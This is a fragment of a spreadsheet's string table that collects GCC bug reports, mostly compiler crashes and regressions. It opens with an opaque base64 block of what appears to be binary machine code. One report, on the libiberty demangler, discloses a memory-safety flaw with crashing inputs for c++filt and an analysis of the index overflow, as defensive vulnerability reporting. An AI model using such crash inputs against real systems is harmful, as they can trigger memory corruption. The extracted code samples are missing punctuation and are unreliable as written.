 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</t>
  </si>
  <si>
    <t>cingular</t>
  </si>
  <si>
    <t>GCC-78211</t>
  </si>
  <si>
    <t>[7 Regression] -fcompare-debug failure with -flto -fno-use-linker-plugin</t>
  </si>
  <si>
    <t>Created attachment 39965
Test case: input19e.ii compile with -fcompare-debug -flto -fno-use-linker-plugin -O3
Using
   g++ -S -fcompare-debug -flto -fno-use-linker-plugin -O3 input19e.ii
gives
   g++: error: input19e.ii: -fcompare-debug failure</t>
  </si>
  <si>
    <t>GCC-66421</t>
  </si>
  <si>
    <t>G++ fails compilation when assigning tuple created with variadic template to auto variable</t>
  </si>
  <si>
    <t>Created attachment 35697
File generated with -save-temps
The following code contains two equivalent functions one declaring a variable with auto and the other specifying the variable type explicitly. The function using auto fails to compile although the two functions provided are equivalent. clang++ successfully compiles the code:
    #include 
    template 
    struct DimTupleImpl {
        using type = typename DimTupleImpl::type
    }
    template 
    struct DimTupleImpl {
        using type = std::tuple
    }
    // Tuple with N elements all of type T
    template 
    struct DimTuple {
        using type = typename DimTupleImpl::type
    }
    template 
    void foo(Params... params) {
        auto tuple = std::make_tuple((size_t)params...)
    }
    template 
    void bar(Params... params) {
        typename DimTuple::type tuple = std::make_tuple((size_t)params...)
    }
    int main() {
        foo(123) // Fails clang++ compiles it
        bar(123) // Compiles correctly
        return 0
    }
# Compiled as: 
g++ -std=c++11 main.cpp
# Compiler output:
main.cpp: In instantiation of â€˜void foo(Params ...) [with Params = {int int int}]â€™:
main.cpp:30:14:   required from here
main.cpp:21:51: error: conversion from â€˜std::tupleâ€™ to non-scalar type â€˜std::tupleâ€™ requested
     auto tuple = std::make_tuple((size_t)params...)
                                                   ^
# System:
Lubuntu 15.04
# Compiler info:
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.9/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 4.9.2-10ubuntu13' --with-bugurl=file:///usr/share/doc/gcc-4.9/README.Bugs --enable-languages=cc++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-4.9 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.9 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --disable-vtable-verify --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.9-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.9-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.9-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --enable-multilib --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.9.2 (Ubuntu 4.9.2-10ubuntu13)</t>
  </si>
  <si>
    <t>svalorzen</t>
  </si>
  <si>
    <t>GCC-51767</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE with degenerated asm goto</t>
  </si>
  <si>
    <t>extern void fn1 (void) fn2 (void)
static inline __attribute__((always_inline)) int
foo (int *x long y)
{
  asm goto ( : : r (x) r (y) : memory : lab)
  return 0
lab:
  return 1
}
void
bar (int *x)
{
  if (foo (x 23))
    fn1 ()
  else
    fn2 ()
  foo (x 2)
}
ICEs at -O2 on x86_64-linux.</t>
  </si>
  <si>
    <t>GCC-34753</t>
  </si>
  <si>
    <t>[4.3 regression] ICE with invalid template parameter in variadic template</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE on mainline:
================================================================
template struct A
{
  template struct B {}
}
A::B b
================================================================
bug.cc:3: error: parameter packs not expanded with `...':
bug.cc:3: note:         'T'
bug.cc: In instantiation of 'A':
bug.cc:6:   instantiated from here
bug.cc:3: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]
The ICE appeared between 2007-11-30 and 2007-12-11.</t>
  </si>
  <si>
    <t>GCC-15427</t>
  </si>
  <si>
    <t>[3.4/4.0 regression] valid code results in incomplete type error</t>
  </si>
  <si>
    <t>The following code:
template
struct A
{
    T foo
}
template
struct B
{
    A _squares[2]
}
results in:
&gt;/dept/rnd/vendor/gcc-3.4.0/bin/g++ -c testCornerFinder.C
testCornerFinder.C:10: error: field `_squares' has incomplete type
with gcc-3.4.  gcc-3.3 compiles this code correctly.  The code
also compiles if the [2] is removed.
-nick</t>
  </si>
  <si>
    <t>nick</t>
  </si>
  <si>
    <t>GCC-43999</t>
  </si>
  <si>
    <t>Gcc (lib1funcs.asm) doesn't build on ARM/Thumb2</t>
  </si>
  <si>
    <t>/Users/cedric/software/gcc-4.5.0/build-stm32xx/./gcc/xgcc -B/Users/cedric/software/gcc-4.5.0/build-stm32xx/./gcc/ -B/nfs/darwin/arm-stm32xx-eabi/bin/ -B/nfs/darwin/arm-stm32xx-eabi/lib/ -isystem /nfs/darwin/arm-stm32xx-eabi/include -isystem /nfs/darwin/arm-stm32xx-eabi/sys-include    -mcpu=cortex-m3 -mtune=cortex-m3 -mthumb -D__thumb2__ -mabi=aapcs-linux -mfloat-abi=soft -O2 -fomit-frame-pointer -falign-functions=16 -fsigned-char -fwrapv -fno-strict-aliasing -DPREFER_SIZE_OVER_SPEED -D__OPTIMIZE_SIZE__ -mthumb -O2  -mcpu=cortex-m3 -mtune=cortex-m3 -mthumb -D__thumb2__ -mabi=aapcs-linux -mfloat-abi=soft -O2 -fomit-frame-pointer -falign-functions=16 -fsigned-char -fwrapv -fno-strict-aliasing -DPREFER_SIZE_OVER_SPEED -D__OPTIMIZE_SIZE__ -DIN_GCC -DCROSS_DIRECTORY_STRUCTURE  -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -fno-inline -Wno-missing-prototypes -g  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -Dinhibit_libc  -I. -I. -I../../.././gcc -I../../../../libgcc -I../../../../libgcc/. -I../../../../libgcc/../gcc -I../../../../libgcc/../include  -DHAVE_CC_TLS  -o _udivsi3.o -MT _udivsi3.o -MD -MP -MF _udivsi3.dep -DL_udivsi3 -xassembler-with-cpp \
	  -c ../../../../libgcc/../gcc/config/arm/lib1funcs.asm
../../../../libgcc/../gcc/config/arm/lib1funcs.asm: Assembler messages:
../../../../libgcc/../gcc/config/arm/lib1funcs.asm:624: Warning: conditional infixes are deprecated in unified syntax
../../../../libgcc/../gcc/config/arm/lib1funcs.asm:624: Error: incorrect condition in IT block -- `movnes r3r3lsr#4'
../../../../libgcc/../gcc/config/arm/lib1funcs.asm:624: Error: incorrect condition in IT block -- `movne r1r1lsr#4'
make[4]: *** [_udivsi3.o] Error 1
make[3]: *** [multi-do] Error 1
make[2]: *** [all-multi] Error 2
make[1]: *** [all-target-libgcc] Error 2</t>
  </si>
  <si>
    <t>cedric</t>
  </si>
  <si>
    <t>GCC-6673</t>
  </si>
  <si>
    <t>gcc-3.1 produces wrong assembly code</t>
  </si>
  <si>
    <t xml:space="preserve">	I build powerpc-unknown-eabi cross compiler using gcc
	CVS tree (cvs co -r gcc_3_1_release).
	input source (ex.c) is:
	============================================================ 
	    unsigned long a
	    int
	    main(void)
	    {
		for ()
		    ++a
	    }
	============================================================ 
	'ppc-eabi-gcc -O1 -S ex.c' generates:
	============================================================ 
		    .file	ex.c
		    .globl __eabi
		    .section	.text
		    .align 2
		    .globl main
		    .type	main@function
	    main:
		    stwu 1-8(1)
		    mflr 0
		    stw 012(1)
		    bl __eabi
	    .L2:
		    b .L2
	    .Lfe1:
		    .size	main.Lfe1-main
		    .comm	a44
		    .ident	GCC: (GNU) 3.1
	============================================================ 
	There's no asm code for '++a'.
	ppc-eabi-gcc 2.95.4 20010319 (prerelease) works as I expected.
Release:
3.1
Environment:
System: Linux namsh 2.4.19-pre8 #3 +-Y 5?u 3 11:33:25 KST 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: powerpc-unknown-eabi
configured with: ./configure --disable-nls --target=ppc-eabi --prefix=/usr/GNUPPC --with-gnu-ld --with-gnu-as --program-prefix=ppc-eabi-
How-To-Repeat:
	Always...
	preprocessor output is same as input source. so simple source</t>
  </si>
  <si>
    <t>namsh</t>
  </si>
  <si>
    <t>GCC-22029</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE with -fdump-tree-copyprop3-details</t>
  </si>
  <si>
    <t>The following code ICEs with -ftree-vectorize -O1 -msse3 -fdump-tree-copyprop3-details:
#include 
void dupa()
{
        double* wagi
        unsigned int isynapsy=100
        wagi = (double*)malloc(100*synapsy)
        for( i=0i&lt;synapsyi++ ) {
                wagi[i] = 0
        }
}</t>
  </si>
  <si>
    <t>GCC-38271</t>
  </si>
  <si>
    <t>[4.4 Regression] Spurious / missing ... used uninitialized in this function warning</t>
  </si>
  <si>
    <t>gcc -S -O1 -Wuninitialized uninitialized.c
GCC 4.4.0 20081121:
  warning: 's' is used uninitialized in this function
GCC 4.3.2:
  warning: â€˜iâ€™ may be used uninitialized in this function</t>
  </si>
  <si>
    <t>GCC-21584</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE: verify_flow_sensitive_alias_info failed.</t>
  </si>
  <si>
    <t>G++ at O1 or above aborts with
ps.ii: In function 'void baz()':
ps.ii:24: error: Pointers with a memory tag should have points-to sets or point
to malloc
p_40 name memory tag: NMT.6 points-to vars: { }
p UID 0 char * type memory tag: TMT.3
ps.ii:24: internal compiler error: verify_flow_sensitive_alias_info failed.</t>
  </si>
  <si>
    <t>graham.stott</t>
  </si>
  <si>
    <t>GCC-26655</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] ICE in ix86_secondary_memory_needed at config/i386/i386.c:16446</t>
  </si>
  <si>
    <t>Summary:  ICE in gcc
Version:  gcc-4.2.0 20060304
Hardware: Athlon Thunderbird 1.33 GHz 256 MB
OS:       GNU/Linux Debian Knoppix kernel 2.6.11
Command Line:
gcc -O3 -g -Wall -Wno-switch  -DHAVE_AV_CONFIG_H -I.. -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE -D_GNU_SOURCE   -c -o snow.o snow.c
snow.c: In function 'slice_buffer_load_line':
snow.c:503: warning: unused variable 'i'
snow.c: In function 'slice_buffer_release':
snow.c:526: warning: unused variable 'i'
snow.c: In function 'horizontal_decomposeX':
snow.c:936: warning: unused variable 'A4'
snow.c:936: warning: unused variable 'A3'
snow.c:936: warning: unused variable 'A2'
snow.c:936: warning: unused variable 'A1'
snow.c: In function 'horizontal_composeX':
snow.c:955: warning: unused variable 'A4'
snow.c:955: warning: unused variable 'A3'
snow.c:955: warning: unused variable 'A2'
snow.c:955: warning: unused variable 'A1'
snow.c: In function 'horizontal_decompose53i':
snow.c:1013: warning: unused variable 'A4'
snow.c:1013: warning: unused variable 'A3'
snow.c:1013: warning: unused variable 'A2'
snow.c:1013: warning: unused variable 'A1'
snow.c: In function 'horizontal_compose53i':
snow.c:1271: warning: unused variable 'A4'
snow.c:1271: warning: unused variable 'A3'
snow.c:1271: warning: unused variable 'A2'
snow.c:1271: warning: unused variable 'A1'
snow.c: In function 'vertical_compose97i':
snow.c:1455: warning: unused variable 'r'
snow.c: In function 'decode_subband_slice_buffered':
snow.c:1880: warning: unused variable 'x'
snow.c: In function 'add_yblock_buffered':
snow.c:2596: warning: left shift count is negative
snow.c:2580: warning: unused variable 'block_index'
snow.c: In function 'add_yblock':
snow.c:2743: warning: left shift count is negative
snow.c: In function 'predict_slice_buffered':
snow.c:2819: warning: passing argument 6 of 'add_yblock_buffered' discards qualifiers from pointer target type
snow.c: In function 'predict_slice':
snow.c:2877: warning: passing argument 5 of 'add_yblock' discards qualifiers from pointer target type
snow.c: In function 'quantize':
snow.c:2899: warning: unused variable 'tstart'
snow.c:2899: warning: unused variable 'tend'
snow.c: In function 'dequantize_slice_buffered':
snow.c:2955: warning: unused variable 'h'
snow.c: In function 'correlate_slice_buffered':
snow.c:3033: warning: unused variable 'h'
snow.c: In function 'common_init':
snow.c:3231: warning: assignment from incompatible pointer type
snow.c:3231: warning: assignment from incompatible pointer type
snow.c:3232: warning: assignment from incompatible pointer type
snow.c:3232: warning: assignment from incompatible pointer type
snow.c:3233: warning: assignment from incompatible pointer type
snow.c:3233: warning: assignment from incompatible pointer type
snow.c:3234: warning: assignment from incompatible pointer type
snow.c:3234: warning: assignment from incompatible pointer type
snow.c: At top level:
snow.c:1390: warning: 'spatial_compose53i' defined but not used
snow.c:1569: warning: 'spatial_compose97i' defined but not used
snow.c: In function 'mc_block':
common.h:464: error: impossible register constraint in 'asm'
snow.c:2410: internal compiler error: in ix86_secondary_memory_needed at config/i386/i386.c:16446
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
mtodorovac@zion:~/cinelerra-2.0/quicktime/ffmpeg.071405/libavcodec$ 
PLEASE FIND snow.i will be given in attachment after sending this (too much for copy &amp; paste).
M.</t>
  </si>
  <si>
    <t>mtodorov</t>
  </si>
  <si>
    <t>GCC-14113</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] -O2 corrupts stack</t>
  </si>
  <si>
    <t>SYMPTOM
The following code example crashes in the sense that it acts as if it couldn't
find the (obviously present) try block.
SNIPPET
The following function seems to be the critical one the full code of the
program is included below. As shown the problem occurs when compiled with -W
-Wall -O2 and goes away if either -O2 is omitted or one of the two marked
places is changed:
void A::t2( const std::string &amp; s1 const std::string &amp; s2 )
{
   int i
   if ( ! get( i ) )
   {
         do { std::ostringstream oss oss &lt;&lt; __FILE__ &lt;&lt; __LINE__ &lt;&lt;   &lt;&lt;
kasimir throw oss.str() } while ( 1 )  // normally a THROW() macro
         // Change to throw std::string( kasimir ) lets the problem
disappear althouth this is _not_ the throw that will be executed.
   }
   switch ( i )
   {
      case 1:
         f1( s1 s2 )
         break
      case 2:
         f2( s1 s2 false )
         break
      case 3:
         f2( s1 s2 true )
         break
// Change case 2 and case 3 to
//    case 2:
//    case 3:
//       f2( s1 s2 i == 3 )
//       break
// makes the problem disappear.
      case 7:
      case 8:
         f3( s1 s2 )
         break
   }
}
COMPILER
gcc-3.3-20040209/bin/g++ -v
Reading specs from
/opt/global/gcc-3.3-20040209/lib/gcc-lib/sparc-sun-solaris2.8/3.3.3/specs
Configured with: ./configure --prefix=/opt/global/gcc-3.3-20040209
--enable-shared --enable-threads --with-cpu=v9 --with-gnu-as
--with-as=/opt/global/gcc-3.3-32-solaris8-108528-20/bin/as
--enable-languages=cc++ --with-gnu-ld
--with-ld=/opt/global/gcc-3.3-32-solaris8-108528-20/bin/ld --disable-multilib
Thread model: posix
gcc version 3.3.3 20040209 (prerelease)
gcc-3.3-32-solaris8-108528-20/bin/g++ -v 
Reading specs from
gcc-3.3-32-solaris8-108528-20/bin/../lib/gcc-lib/sparc-sun-solaris2.8/3.3/specs
Configured with: ../gcc-3.3/configure
--prefix=/opt/global/gcc-3.3-32-solaris8-108528-20 --enable-shared
--enable-threads --with-cpu=v9 --with-gnu-as
--with-as=/opt/global/gcc-3.3-32-solaris8-108528-20/bin/as --with-gnu-ld
--with-ld=/opt/global/gcc-3.3-32-solaris8-108528-20/bin/ld --disable-multilib
Thread model: posix
gcc version 3.3
gcc-3.3.1-DEPRECATED/bin/g++ -v
Reading specs from
gcc-3.3.1-DEPRECATED/bin/../lib/gcc-lib/sparc-sun-solaris2.8/3.3.1/specs
Configured with: ./configure
--prefix=/opt/global/gcc-3.3.1-32-solaris8-108528-20 --enable-shared
--enable-threads --with-cpu=v9 --with-gnu-as
--with-as=/opt/global/gcc-3.3-32-solaris8-108528-20/bin/as
--enable-languages=cc++ --with-gnu-ld
--with-ld=/opt/global/gcc-3.3-32-solaris8-108528-20/bin/ld --disable-multilib
Thread model: posix
gcc version 3.3.1
(The 3.3.1 is modified - it contains the patch for bug 12301.)
SOURCE
The source is put into two files to prevent inlining...
bug02.hh:
#include 
#include 
bool get( int 
struct A
{
   void t2( const std::string 
   void f1( const std::string 
   void f2( const std::string 
   void f3( const std::string 
}
#define THROW( MeSSaGe ) \
do { std::ostringstream oss oss &lt;&lt; __FILE__ &lt;&lt; __LINE__ &lt;&lt; ' ' &lt;&lt; MeSSaGe
throw oss.str() } while( 1 )
bug02-broken.cc:
#include 
#include 
#include bug02.hh
void A::t2( const std::string &amp; s1 const std::string &amp; s2 )
{
   int i
   if ( ! get( i ) )
   {
      THROW( kasimir )
   }
   switch ( i )
   {
      case 1:
         f1( s1 s2 )
         break
      case 2:
         f2( s1 s2 false )
         break
      case 3:
         f2( s1 s2 true )
         break
      case 7:
      case 8:
         f3( s1 s2 )
         break
   }
}
int main( int char ** )
{
   A * a = new A
   try
   {
      a-&gt;t2( std::string( foo ) std::string( bar ) )
   }
   catch ( std::string &amp; s )
   {
      std::cerr &lt;&lt; s &lt;&lt; '\n'
   }
   return 0
}
bug02-lib.cc:
#include bug02.hh
bool get( int &amp; i )
{
   i = 3
   return true
}
void A::f1( const std::string &amp; const std::string &amp; )
{
}
void A::f2( const std::string &amp; s1 const std::string &amp; s2 bool )
{
   // At this point it doesn't seem to matter how the exception is thrown.
   // This is the exception that is thrown and that is not caught by the
   // catch in main() - unless one of the three changes outlined above is
   // made.
        throw std::string( nasenbaer )
//   THROW( s1 &lt;&lt; s2 )
}
void A::f3( const std::string &amp; const std::string &amp; )
{
}
STACK
An excerpt from the stacktrace obtained from our full software that has a
crash/signal/assert/uncaught-exception handler that executes pstack to get a
stacktrace of the crash - seems that something is broken so that it doesn't find
the catch block for the exception.
 fe1f0d4c _thrp_kill (0 1 6 fe20c000 1 fe21321c) + f8
 fe34ba74 raise    (6 6 ffbedc88 42c2 6 2c0e5c) + 40
 fe33591c abort    (fe3bc000 0 ffbedd28 189d1c 0 0) + c0
 00189d2c _ZN4Base14terminate_funcEv (1edf90 ffbeddd4 23f768 2c0e50 0 1) + 8c
 feee59f4 _ZN10__cxxabiv111__terminateEPFvvE (189ca0 1be1dc ffbee2a8 0 1 0) + 4
 feee58d4 __gxx_personality_v0 (3 1cfab4 474e5543 432b2b00 a98bb8 ffbee2a8)
+ 4ac
 fe3e5460 _Unwind_RaiseException_Phase2 (2 ffbee2a8 0 ffbee5f8 4 0) + 7c
 fe3e578c _Unwind_Resume (a98be8 ffffffff 1ed400 68 5fba 1bc008) + 50</t>
  </si>
  <si>
    <t>GCC-43764</t>
  </si>
  <si>
    <t>-mrelax-pic-calls fails with complex types</t>
  </si>
  <si>
    <t>Compiling code that calls a function that returns a complex type with -mrelax-pic-calls results in an ICE.
khazaddum$ cat tmp.c
__complex__ double cd
__complex__ double foo (void) { return cd }
void bar (void) { cd = foo () }
khazaddum$ ./xgcc -B./ -mabicalls -G0 -mrelax-pic-calls -mexplicit-relocs -O -S tmp.c
tmp.c: In function â€˜barâ€™:
tmp.c:3:1: error: could not split insn
(call_insn/i 6 18 7 tmp.c:3 (parallel [
            (set (reg:DF 32 $f0)
                (call (mem:SI (reg/f:SI 25 $25 [195]) [0 S4 A32])
                    (unspec [
                            (const_int 16 [0x10])
                            (symbol_ref:SI (foo) [flags 0x3] )
                        ] 55)))
            (set (reg:DF 34 $f2)
                (call (mem:SI (reg/f:SI 25 $25 [195]) [0 S4 A32])
                    (const_int 16 [0x10])))
            (clobber (reg:SI 31 $31))
        ]) 574 {call_value_multiple_internal} (expr_list:REG_DEAD (reg/f:SI 25 $25 [195])
        (expr_list:REG_EH_REGION (const_int 0 [0x0])
            (nil)))
    (expr_list:REG_DEP_TRUE (use (reg:SI 79 $fakec))
        (nil)))
tmp.c:3:1: internal compiler error: in final_scan_insn at final.c:2650
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
I used a mipsisa32r2-sde-elf toolchain for this configured without an assembler.  If you configure properly with an assembler then it isn't necessary to give the -mrelax-pic-calls and -mexplicit-relocs options.  All you need it -mabicalls and -G 0.
The problem is in mips_annotate_pic_calls.  It looks for a CALL rtx and then modifies it.  Unfortunately a function returning complex has a call insn with 2 CALL rtx.  Because only one was modified we end up with unrecognizable RTL.  We either need to disable the optimization in this case or extend it to work with a call insn with more than one CALL rtx.  The first one is easier the second one is preferable.</t>
  </si>
  <si>
    <t>GCC-70926</t>
  </si>
  <si>
    <t>Libiberty Demangler segfaults (5)</t>
  </si>
  <si>
    <t>A write access violation on destination operand in the libiberty demangler causes its host applications to crash. There are also two other read access violations on source operand that are caused by the same problem (overflow when parsing a number).
How to reproduce:
$valgrind c++filt 0__Ot2m02R5T0000500000
==86038== Invalid read of size 1
==86038==    at 0x752150: do_type (cplus-dem.c:3729)
==86038==    by 0x7640F5: do_arg (cplus-dem.c:4239)
==86038==    by 0x7659D7: demangle_args (cplus-dem.c:4528)
==86038==    by 0x778425: demangle_signature (cplus-dem.c:1645)
==86038==    by 0x784701: internal_cplus_demangle (cplus-dem.c:1204)
==86038==    by 0x74F572: cplus_demangle (cplus-dem.c:887)
==86038==    by 0x406251: demangle_it (cxxfilt.c:62)
==86038==    by 0x40582E: main (cxxfilt.c:227)
$ valgrind c++filt 0__GT50000000000_
==10196== Invalid read of size 8
==10196==    at 0x7519A7: do_type (cplus-dem.c:3623)
==10196==    by 0x763DB5: do_arg (cplus-dem.c:4249)
==10196==    by 0x76568F: demangle_args (cplus-dem.c:4538)
==10196==    by 0x778825: demangle_signature (cplus-dem.c:1653)
==10196==    by 0x784961: internal_cplus_demangle (cplus-dem.c:1210)
==10196==    by 0x74F582: cplus_demangle (cplus-dem.c:893)
==10196==    by 0x406251: demangle_it (cxxfilt.c:62)
==10196==    by 0x40582E: main (cxxfilt.c:227)
$ valgrind c++filt __t2m05B500000000000000000_
==13052== Invalid read of size 8
==13052==    at 0x7541FF: do_type (cplus-dem.c:3798)
==13052==    by 0x76B2B3: demangle_template.constprop.15 (cplus-dem.c:2241)
==13052==    by 0x7761B7: demangle_signature (cplus-dem.c:1573)
==13052==    by 0x784811: internal_cplus_demangle (cplus-dem.c:1210)
==13052==    by 0x74F582: cplus_demangle (cplus-dem.c:893)
==13052==    by 0x406251: demangle_it (cxxfilt.c:62)
==13052==    by 0x40582E: main (cxxfilt.c:227)
Analysis: The demangler reads sometimes the value of an array index from the mangled string. Now it is checked whether it exceeds the array length. However the parsing can cause an overflow and the index is negative.
This vulnerability was found with a more efficient version of AFL.
I am preparing a patch.</t>
  </si>
  <si>
    <t>GCC-22392</t>
  </si>
  <si>
    <t>Huge memory usage and infinite(?) loop with -fno-enforce-eh-specs</t>
  </si>
  <si>
    <t>[ forwarded from http://bugs.debian.org/317563 ]
The test case chews up 789m of memory and then doesn't seem to progress
for at least 10 minutes with -O2 -fno-enforce-eh-specs. Functions showing up
prominently in a profile are:
